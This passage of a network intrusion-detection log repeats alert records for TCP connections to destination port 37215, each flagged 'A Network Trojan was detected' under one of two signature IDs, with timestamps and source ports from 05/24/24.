              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.377156
              SID:2829579
              Source Port:55100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.680998
              SID:2829579
              Source Port:33698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.269998
              SID:2829579
              Source Port:46694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.630738
              SID:2829579
              Source Port:40564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.505570
              SID:2835222
              Source Port:53246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.121350
              SID:2829579
              Source Port:52678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.124861
              SID:2835222
              Source Port:58930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.099801
              SID:2829579
              Source Port:54722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.435302
              SID:2829579
              Source Port:59958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575241
              SID:2829579
              Source Port:40020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.361284
              SID:2829579
              Source Port:33268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.062768
              SID:2829579
              Source Port:51838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313606
              SID:2829579
              Source Port:54156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.503141
              SID:2829579
              Source Port:58804
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.117316
              SID:2829579
              Source Port:51584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535263
              SID:2829579
              Source Port:49898
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.233906
              SID:2829579
              Source Port:44618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.231705
              SID:2829579
              Source Port:51548
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.515521
              SID:2835222
              Source Port:33380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.591593
              SID:2829579
              Source Port:53122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.060023
              SID:2835222
              Source Port:49306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.921132
              SID:2829579
              Source Port:44506
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186936
              SID:2829579
              Source Port:35836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187063
              SID:2835222
              Source Port:46876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.334234
              SID:2835222
              Source Port:50408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.123275
              SID:2835222
              Source Port:36128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.493219
              SID:2829579
              Source Port:42156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061219
              SID:2829579
              Source Port:38956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.752658
              SID:2835222
              Source Port:59906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.859586
              SID:2829579
              Source Port:40726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482714
              SID:2829579
              Source Port:39460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.278819
              SID:2829579
              Source Port:49768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.378075
              SID:2829579
              Source Port:54198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.506250
              SID:2829579
              Source Port:50986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.976714
              SID:2835222
              Source Port:33988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.111480
              SID:2835222
              Source Port:38024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.664508
              SID:2835222
              Source Port:49266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535989
              SID:2835222
              Source Port:57472
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.545575
              SID:2829579
              Source Port:42052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.101762
              SID:2835222
              Source Port:58988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.208365
              SID:2835222
              Source Port:35222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.123820
              SID:2829579
              Source Port:52724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.502877
              SID:2829579
              Source Port:59302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.332189
              SID:2829579
              Source Port:49566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.110924
              SID:2835222
              Source Port:40862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.477307
              SID:2829579
              Source Port:43314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.545588
              SID:2829579
              Source Port:55236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661932
              SID:2835222
              Source Port:39496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.445040
              SID:2829579
              Source Port:37024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.278764
              SID:2829579
              Source Port:39622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.303169
              SID:2835222
              Source Port:48544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.662603
              SID:2829579
              Source Port:54394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.431480
              SID:2835222
              Source Port:59860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.989841
              SID:2835222
              Source Port:59406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.329782
              SID:2829579
              Source Port:49668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.431423
              SID:2835222
              Source Port:38568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.591864
              SID:2835222
              Source Port:59614
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.152583
              SID:2835222
              Source Port:49578
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727614
              SID:2829579
              Source Port:46086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.572059
              SID:2835222
              Source Port:57930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.797697
              SID:2829579
              Source Port:60148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.334472
              SID:2829579
              Source Port:37430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.545705
              SID:2835222
              Source Port:59648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.551734
              SID:2835222
              Source Port:40622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.536432
              SID:2829579
              Source Port:39788
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575211
              SID:2829579
              Source Port:57070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.536570
              SID:2835222
              Source Port:40372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.550726
              SID:2835222
              Source Port:47800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.122552
              SID:2829579
              Source Port:54400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.515605
              SID:2835222
              Source Port:52598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.411919
              SID:2835222
              Source Port:57354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.796193
              SID:2829579
              Source Port:43792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.582012
              SID:2829579
              Source Port:48286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.161274
              SID:2829579
              Source Port:36592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.078196
              SID:2829579
              Source Port:48608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100633
              SID:2835222
              Source Port:52576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.519552
              SID:2829579
              Source Port:38568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.592040
              SID:2829579
              Source Port:33330
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.383380
              SID:2829579
              Source Port:59248
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.076613
              SID:2829579
              Source Port:54286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.209601
              SID:2835222
              Source Port:48838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.113589
              SID:2829579
              Source Port:57626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.764047
              SID:2829579
              Source Port:47162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857153
              SID:2835222
              Source Port:35736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.267785
              SID:2835222
              Source Port:36304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.116140
              SID:2829579
              Source Port:36542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396057
              SID:2835222
              Source Port:38952
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279818
              SID:2835222
              Source Port:41656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.302961
              SID:2835222
              Source Port:59690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.507252
              SID:2829579
              Source Port:42368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.368613
              SID:2835222
              Source Port:38550
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.418933
              SID:2835222
              Source Port:33222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.057564
              SID:2835222
              Source Port:43528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.586050
              SID:2835222
              Source Port:51582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.602639
              SID:2829579
              Source Port:38274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.368986
              SID:2835222
              Source Port:38820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.450476
              SID:2835222
              Source Port:43408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.054089
              SID:2829579
              Source Port:46308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.398216
              SID:2835222
              Source Port:42000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574681
              SID:2835222
              Source Port:44690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.447880
              SID:2829579
              Source Port:50544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.446477
              SID:2829579
              Source Port:53532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638463
              SID:2829579
              Source Port:36714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.486023
              SID:2829579
              Source Port:32890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.833862
              SID:2829579
              Source Port:50988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.329408
              SID:2835222
              Source Port:41672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.506087
              SID:2829579
              Source Port:33882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.207243
              SID:2829579
              Source Port:40328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099553
              SID:2835222
              Source Port:49862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.799061
              SID:2829579
              Source Port:42700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396346
              SID:2835222
              Source Port:42674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.402203
              SID:2829579
              Source Port:49274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.202886
              SID:2835222
              Source Port:34368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055471
              SID:2829579
              Source Port:58718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.634040
              SID:2835222
              Source Port:45426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.347627
              SID:2829579
              Source Port:60640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.111942
              SID:2829579
              Source Port:40698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.059912
              SID:2829579
              Source Port:35746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188082
              SID:2835222
              Source Port:57114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725293
              SID:2829579
              Source Port:47156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.194023
              SID:2835222
              Source Port:46806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.267146
              SID:2835222
              Source Port:51392
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.724255
              SID:2829579
              Source Port:39876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.280061
              SID:2829579
              Source Port:44734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.693102
              SID:2835222
              Source Port:60066
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.116333
              SID:2835222
              Source Port:54394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.123632
              SID:2835222
              Source Port:38306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.168574
              SID:2835222
              Source Port:42984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.724751
              SID:2829579
              Source Port:52618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.507182
              SID:2829579
              Source Port:41544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802609
              SID:2835222
              Source Port:36312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.287928
              SID:2835222
              Source Port:58782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624150
              SID:2829579
              Source Port:42850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100771
              SID:2835222
              Source Port:55906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.078230
              SID:2829579
              Source Port:37736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.060740
              SID:2835222
              Source Port:38368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279738
              SID:2835222
              Source Port:57968
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.078063
              SID:2829579
              Source Port:44444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.108732
              SID:2835222
              Source Port:49448
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.210032
              SID:2829579
              Source Port:33400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.125004
              SID:2829579
              Source Port:48184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395519
              SID:2829579
              Source Port:60328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.368711
              SID:2835222
              Source Port:37070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.400761
              SID:2829579
              Source Port:40632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625210
              SID:2829579
              Source Port:42250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.775397
              SID:2829579
              Source Port:45012
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.694761
              SID:2835222
              Source Port:42984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537538
              SID:2835222
              Source Port:36240
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.744763
              SID:2829579
              Source Port:45596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.987251
              SID:2835222
              Source Port:56814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.100006
              SID:2835222
              Source Port:33556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.422350
              SID:2829579
              Source Port:53922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397266
              SID:2835222
              Source Port:45718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.280929
              SID:2835222
              Source Port:48928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.103715
              SID:2829579
              Source Port:35970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.689859
              SID:2829579
              Source Port:46014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.547366
              SID:2829579
              Source Port:42084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.460524
              SID:2835222
              Source Port:42672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.640611
              SID:2835222
              Source Port:53762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.831460
              SID:2829579
              Source Port:47114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.444153
              SID:2829579
              Source Port:57244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.448056
              SID:2835222
              Source Port:54318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535438
              SID:2835222
              Source Port:41674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.692683
              SID:2829579
              Source Port:47070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575233
              SID:2835222
              Source Port:50342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.551735
              SID:2829579
              Source Port:34446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537559
              SID:2829579
              Source Port:58922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.878188
              SID:2835222
              Source Port:45796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.485500
              SID:2835222
              Source Port:45378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727317
              SID:2829579
              Source Port:35396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.570470
              SID:2829579
              Source Port:33484
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.208144
              SID:2835222
              Source Port:53742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.969209
              SID:2829579
              Source Port:47342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.109624
              SID:2835222
              Source Port:39744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.814778
              SID:2835222
              Source Port:33726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.284166
              SID:2835222
              Source Port:41890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.210166
              SID:2829579
              Source Port:51660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.506833
              SID:2829579
              Source Port:44222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.333794
              SID:2835222
              Source Port:42336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517904
              SID:2835222
              Source Port:57464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.391573
              SID:2835222
              Source Port:33942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.803072
              SID:2835222
              Source Port:52774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.481126
              SID:2835222
              Source Port:38784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.280327
              SID:2829579
              Source Port:43188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432384
              SID:2835222
              Source Port:34472
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.063328
              SID:2835222
              Source Port:33898
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574810
              SID:2835222
              Source Port:46510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.567248
              SID:2835222
              Source Port:44608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.550455
              SID:2835222
              Source Port:42406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.484362
              SID:2835222
              Source Port:32986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536816
              SID:2829579
              Source Port:54668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.543710
              SID:2829579
              Source Port:55216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.203264
              SID:2829579
              Source Port:50524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.053991
              SID:2829579
              Source Port:51636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.552286
              SID:2829579
              Source Port:33352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574720
              SID:2835222
              Source Port:45468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.152707
              SID:2829579
              Source Port:53140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
